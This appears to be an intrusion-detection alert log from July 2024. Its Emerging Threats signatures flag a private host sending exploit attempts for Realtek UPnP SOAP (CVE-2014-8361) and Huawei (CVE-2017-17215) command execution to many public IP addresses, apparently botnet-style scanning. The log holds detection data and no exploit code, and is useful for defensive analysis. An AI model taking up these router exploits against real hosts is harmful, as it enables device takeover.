                                      07/20/24-23:01:42.142802TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3946652869192.168.2.23138.38.220.62
                                      07/20/24-23:01:05.007557TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615488452869192.168.2.23105.183.167.212
                                      07/20/24-23:01:41.882275TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4633652869192.168.2.2334.33.43.162
                                      07/20/24-23:01:47.403768TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5896452869192.168.2.2313.193.24.191
                                      07/20/24-23:01:42.611005TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25634252869192.168.2.23165.21.238.229
                                      07/20/24-23:01:02.048214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4951637215192.168.2.23157.195.164.122
                                      07/20/24-23:01:31.983105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5539437215192.168.2.23197.7.27.198
                                      07/20/24-23:01:44.355606TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3809452869192.168.2.2343.113.255.232
                                      07/20/24-23:02:08.781934TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614246052869192.168.2.2314.40.33.153
                                      07/20/24-23:01:04.113037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4701437215192.168.2.23169.56.210.25
                                      07/20/24-23:01:40.321300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5823437215192.168.2.23203.82.68.43
                                      07/20/24-23:01:01.171532TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3829652869192.168.2.23199.214.91.137
                                      07/20/24-23:01:44.624686TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24565052869192.168.2.23180.49.147.96
                                      07/20/24-23:01:41.229799TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3600852869192.168.2.23108.137.226.148
                                      07/20/24-23:01:41.605496TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4408052869192.168.2.2349.37.83.56
                                      07/20/24-23:00:59.163619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4315437215192.168.2.23197.252.90.201
                                      07/20/24-23:01:07.082045TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6084037215192.168.2.2341.40.31.82
                                      07/20/24-23:01:45.118041TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615114052869192.168.2.23221.199.165.178
                                      07/20/24-23:01:40.294677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4801237215192.168.2.23113.91.253.130
                                      07/20/24-23:01:44.311969TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4429252869192.168.2.232.84.107.116
                                      07/20/24-23:01:42.772926TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5625452869192.168.2.23129.76.21.211
                                      07/20/24-23:01:01.484620TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614122852869192.168.2.239.190.28.75
                                      07/20/24-23:01:40.310207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5638637215192.168.2.23157.65.169.99
                                      07/20/24-23:01:47.042994TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4970852869192.168.2.23107.137.22.219
                                      07/20/24-23:01:24.876750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6038037215192.168.2.23197.235.121.63
                                      07/20/24-23:01:43.475010TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3935852869192.168.2.2312.65.191.23
                                      07/20/24-23:01:52.878047TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4321252869192.168.2.23189.225.243.103
                                      07/20/24-23:01:44.660927TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4622852869192.168.2.23165.194.139.225
                                      07/20/24-23:01:49.138222TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25011452869192.168.2.2386.51.174.240
                                      07/20/24-23:01:41.290281TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616079652869192.168.2.2352.64.207.91
                                      07/20/24-23:01:47.921416TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24590652869192.168.2.23103.0.203.61
                                      07/20/24-23:01:13.811792TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3703452869192.168.2.23151.154.71.43
                                      07/20/24-23:01:04.053605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5740037215192.168.2.23157.25.106.26
                                      07/20/24-23:01:42.699598TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4599652869192.168.2.23219.124.32.18
                                      07/20/24-23:01:31.976795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3901637215192.168.2.23157.98.109.246
                                      07/20/24-23:01:20.098209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3871637215192.168.2.23197.245.168.107
                                      07/20/24-23:01:56.327422TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615223652869192.168.2.2364.44.223.6
                                      07/20/24-23:02:07.236630TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5128852869192.168.2.23144.66.178.116
                                      07/20/24-23:01:26.014513TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5954252869192.168.2.2370.211.204.245
                                      07/20/24-23:01:02.076414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5890437215192.168.2.2341.41.115.0
                                      07/20/24-23:01:32.028836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4851037215192.168.2.23146.240.47.167
                                      07/20/24-23:01:46.340763TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5350652869192.168.2.23203.124.141.209
                                      07/20/24-23:01:53.335084TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5719652869192.168.2.2319.154.207.41
                                      07/20/24-23:01:55.262010TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3812252869192.168.2.23190.187.129.147
                                      07/20/24-23:01:47.042994TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614416052869192.168.2.2367.104.194.85
                                      07/20/24-23:01:01.881568TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3586052869192.168.2.2377.77.58.220
                                      07/20/24-23:01:54.310738TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4876852869192.168.2.23131.175.141.244
                                      07/20/24-23:01:47.297941TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615812052869192.168.2.2341.3.4.242
                                      07/20/24-23:02:22.907274TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23645652869192.168.2.23211.143.251.133
                                      07/20/24-23:01:24.898476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3332637215192.168.2.23197.164.160.245
                                      07/20/24-23:01:27.679304TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5600837215192.168.2.23157.42.253.1
                                      07/20/24-23:01:03.165362TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616030052869192.168.2.2357.92.179.211
                                      07/20/24-23:01:45.622888TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25319252869192.168.2.23133.83.21.166
                                      07/20/24-23:01:53.281781TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3414652869192.168.2.2383.238.5.172
                                      07/20/24-23:01:44.954688TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5017052869192.168.2.23183.249.169.230
                                      07/20/24-23:01:51.063023TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5181052869192.168.2.23133.103.41.145
                                      07/20/24-23:01:31.991548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4910237215192.168.2.23157.161.202.23
                                      07/20/24-23:01:40.334452TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3891237215192.168.2.23197.196.229.191
                                      07/20/24-23:01:41.366269TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5964252869192.168.2.23186.150.2.45
                                      07/20/24-23:01:41.372363TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616018052869192.168.2.23132.173.89.17
                                      07/20/24-23:00:57.221132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4918837215192.168.2.23197.166.141.245
                                      07/20/24-23:01:08.677485TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3288252869192.168.2.23162.162.162.31
                                      07/20/24-23:01:45.109699TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4061052869192.168.2.2365.170.62.168
                                      07/20/24-23:01:20.150638TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4405437215192.168.2.23197.144.175.34
                                      07/20/24-23:01:31.333071TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23428852869192.168.2.23121.166.138.14
                                      07/20/24-23:01:43.030153TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613580652869192.168.2.23140.59.54.38
                                      07/20/24-23:01:12.861753TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6064852869192.168.2.23183.182.103.28
                                      07/20/24-23:01:31.329969TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3947852869192.168.2.2314.200.138.62
                                      07/20/24-23:01:44.005947TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25601452869192.168.2.23119.211.191.173
                                      07/20/24-23:00:57.222080TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4656237215192.168.2.23197.224.182.83
                                      07/20/24-23:01:06.989167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4636037215192.168.2.23157.143.99.221
                                      07/20/24-23:01:02.048113TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5531637215192.168.2.2390.115.47.151
                                      07/20/24-23:01:11.630703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3321037215192.168.2.23111.178.38.86
                                      07/20/24-23:01:49.809920TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26081852869192.168.2.23104.158.63.237
                                      07/20/24-23:01:14.105395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4535037215192.168.2.23197.238.188.119
                                      07/20/24-23:01:54.914948TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5460652869192.168.2.23171.236.184.127
                                      07/20/24-23:01:52.838688TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5007652869192.168.2.23192.175.188.159
                                      07/20/24-23:01:03.422401TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5367052869192.168.2.23132.102.141.171
                                      07/20/24-23:01:24.862410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4098437215192.168.2.23157.167.1.107
                                      07/20/24-23:01:41.496780TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615518252869192.168.2.23171.82.217.243
                                      07/20/24-23:01:50.313415TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613802852869192.168.2.23157.175.172.46
                                      07/20/24-23:01:11.631010TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5503837215192.168.2.2341.178.204.197
                                      07/20/24-23:01:41.372363TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614316252869192.168.2.2347.30.224.199
                                      07/20/24-23:01:53.392806TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5955452869192.168.2.2323.227.245.165
                                      07/20/24-23:01:20.202325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4056237215192.168.2.2341.245.53.9
                                      07/20/24-23:01:41.481591TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3352852869192.168.2.2394.18.60.159
                                      07/20/24-23:01:43.965131TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3459452869192.168.2.23217.141.116.135
                                      07/20/24-23:01:45.667238TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5699452869192.168.2.23140.234.5.119
                                      07/20/24-23:01:45.775798TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614026252869192.168.2.23126.245.117.149
                                      07/20/24-23:01:44.156178TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614975852869192.168.2.23145.77.223.88
                                      07/20/24-23:01:08.629616TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24494652869192.168.2.23180.155.132.167
                                      07/20/24-23:01:58.688551TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4947852869192.168.2.2373.49.232.192
                                      07/20/24-23:01:27.650975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4067637215192.168.2.2341.33.160.160
                                      07/20/24-23:01:59.197251TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5364652869192.168.2.2348.103.95.129
                                      07/20/24-23:01:42.704267TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5524252869192.168.2.2331.234.118.120
                                      07/20/24-23:01:01.278892TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613574652869192.168.2.239.91.73.111
                                      07/20/24-23:01:08.663244TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4173652869192.168.2.23119.8.134.128
                                      07/20/24-23:02:01.964831TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23508452869192.168.2.2343.175.201.8
                                      07/20/24-23:01:02.064358TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5870037215192.168.2.2341.8.18.232
                                      07/20/24-23:01:42.027932TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614059652869192.168.2.23130.186.238.85
                                      07/20/24-23:01:51.266338TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24498852869192.168.2.23113.178.52.80
                                      07/20/24-23:02:04.520145TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5089652869192.168.2.2342.30.159.48
                                      07/20/24-23:01:45.854405TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5090452869192.168.2.23106.212.70.208
                                      07/20/24-23:01:27.658221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4841437215192.168.2.23171.210.254.194
                                      07/20/24-23:01:56.001165TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616044452869192.168.2.23133.79.190.240
                                      07/20/24-23:01:04.098080TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3671237215192.168.2.2341.198.76.252
                                      07/20/24-23:01:20.596401TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24636052869192.168.2.2362.216.86.224
                                      07/20/24-23:01:31.983105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3356637215192.168.2.2341.44.12.1
                                      07/20/24-23:01:41.420715TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614126852869192.168.2.23113.1.100.136
                                      07/20/24-23:01:44.452218TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25233052869192.168.2.23114.234.94.36
                                      07/20/24-23:01:08.590753TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24630652869192.168.2.23169.107.25.12
                                      07/20/24-23:01:46.731900TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5618852869192.168.2.23115.176.151.108
                                      07/20/24-23:01:01.897212TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5388252869192.168.2.23136.74.174.143
                                      07/20/24-23:01:24.877747TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4817637215192.168.2.23191.115.236.117
                                      07/20/24-23:01:27.653586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4839037215192.168.2.23197.171.117.24
                                      07/20/24-23:01:27.666100TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5683637215192.168.2.2320.160.208.40
                                      07/20/24-23:01:52.569791TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4012852869192.168.2.23209.10.74.49
                                      07/20/24-23:02:04.592319TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614978652869192.168.2.23120.171.198.157
                                      07/20/24-23:01:11.822392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5554637215192.168.2.23197.245.180.182
                                      07/20/24-23:01:31.322110TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25090452869192.168.2.23175.125.103.77
                                      07/20/24-23:01:43.895587TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613351852869192.168.2.2357.222.50.62
                                      07/20/24-23:01:11.633481TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5868237215192.168.2.23124.20.21.168
                                      07/20/24-23:01:44.565131TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4194052869192.168.2.23179.51.3.253
                                      07/20/24-23:01:46.471349TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3320852869192.168.2.2368.106.199.227
                                      07/20/24-23:01:27.650975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4619237215192.168.2.2341.158.206.208
                                      07/20/24-23:01:03.919195TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615887852869192.168.2.23162.162.162.31
                                      07/20/24-23:00:57.222279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5860237215192.168.2.23157.10.69.196
                                      07/20/24-23:01:04.118166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4578237215192.168.2.23185.92.40.236
                                      07/20/24-23:01:11.631549TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3586837215192.168.2.23197.11.75.129
                                      07/20/24-23:01:44.855022TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3560052869192.168.2.23203.80.83.187
                                      07/20/24-23:02:03.882859TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5964252869192.168.2.23111.184.238.202
                                      07/20/24-23:01:04.040812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4744637215192.168.2.2341.95.94.208
                                      07/20/24-23:01:27.749737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4709837215192.168.2.23197.163.214.36
                                      07/20/24-23:01:51.835178TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5977852869192.168.2.23196.117.225.80
                                      07/20/24-23:01:20.150638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5594837215192.168.2.23197.57.93.26
                                      07/20/24-23:01:24.876437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5329237215192.168.2.2341.124.8.177
                                      07/20/24-23:01:55.105161TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4305652869192.168.2.2339.142.177.164
                                      07/20/24-23:01:24.910426TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4568637215192.168.2.23157.8.149.199
                                      07/20/24-23:00:57.222129TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4080237215192.168.2.2341.157.99.54
                                      07/20/24-23:01:45.015200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4641252869192.168.2.2350.218.167.53
                                      07/20/24-23:01:09.030401TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3344052869192.168.2.23135.23.236.194
                                      07/20/24-23:01:43.478924TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5625852869192.168.2.23163.162.88.124
                                      07/20/24-23:01:44.944836TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615548452869192.168.2.23113.35.167.52
                                      07/20/24-23:01:42.664090TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5299852869192.168.2.23155.251.124.204
                                      07/20/24-23:02:27.381027TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25488852869192.168.2.23129.78.244.230
                                      07/20/24-23:01:11.631728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3757237215192.168.2.23197.53.147.58
                                      07/20/24-23:01:47.117979TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3742652869192.168.2.2362.238.174.13
                                      07/20/24-23:01:34.044717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4731037215192.168.2.2313.170.167.126
                                      07/20/24-23:01:41.295717TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4129052869192.168.2.23175.125.31.24
                                      07/20/24-23:01:11.631549TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4049237215192.168.2.23197.217.206.213
                                      07/20/24-23:01:58.035425TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5914452869192.168.2.23206.22.220.245
                                      07/20/24-23:01:07.005156TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4490237215192.168.2.23197.119.197.200
                                      07/20/24-23:01:04.014689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4488837215192.168.2.23157.42.165.86
                                      07/20/24-23:01:51.130270TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5473852869192.168.2.2349.152.226.6
                                      07/20/24-23:01:25.787139TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614995452869192.168.2.23175.125.103.77
                                      07/20/24-23:01:41.290518TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4186652869192.168.2.2312.129.173.144
                                      07/20/24-23:01:11.816101TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5765637215192.168.2.2341.176.109.210
                                      07/20/24-23:01:41.286911TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615245652869192.168.2.2354.140.169.156
                                      07/20/24-23:01:44.945909TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614054652869192.168.2.2393.177.145.85
                                      07/20/24-23:01:46.439367TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4490852869192.168.2.23119.138.76.79
                                      07/20/24-23:01:27.666100TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5618837215192.168.2.23204.242.74.211
                                      07/20/24-23:01:51.875785TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615408052869192.168.2.2376.116.108.138
                                      07/20/24-23:01:20.181938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3788637215192.168.2.23157.155.110.53
                                      07/20/24-23:01:52.390301TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5104252869192.168.2.23144.14.202.149
                                      07/20/24-23:01:58.719313TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613975252869192.168.2.23149.74.6.111
                                      07/20/24-23:01:04.049279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3376237215192.168.2.23210.26.13.127
                                      07/20/24-23:01:09.058270TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25439452869192.168.2.23186.94.179.5
                                      07/20/24-23:01:42.592736TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614625852869192.168.2.23179.149.63.116
                                      07/20/24-23:01:58.190255TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25335852869192.168.2.23199.118.63.112
                                      07/20/24-23:02:08.008782TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613742652869192.168.2.23133.167.87.211
                                      07/20/24-23:01:04.050503TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5345837215192.168.2.23197.5.29.40
                                      07/20/24-23:01:50.223705TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3559652869192.168.2.2363.137.171.145
                                      07/20/24-23:01:52.019773TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614291852869192.168.2.23115.65.225.50
                                      07/20/24-23:01:44.674122TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24705452869192.168.2.23179.149.63.116
                                      07/20/24-23:01:47.808098TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4415252869192.168.2.2349.245.141.79
                                      07/20/24-23:01:08.634900TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4577052869192.168.2.23201.173.108.254
                                      07/20/24-23:01:20.169339TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5926837215192.168.2.2313.220.244.166
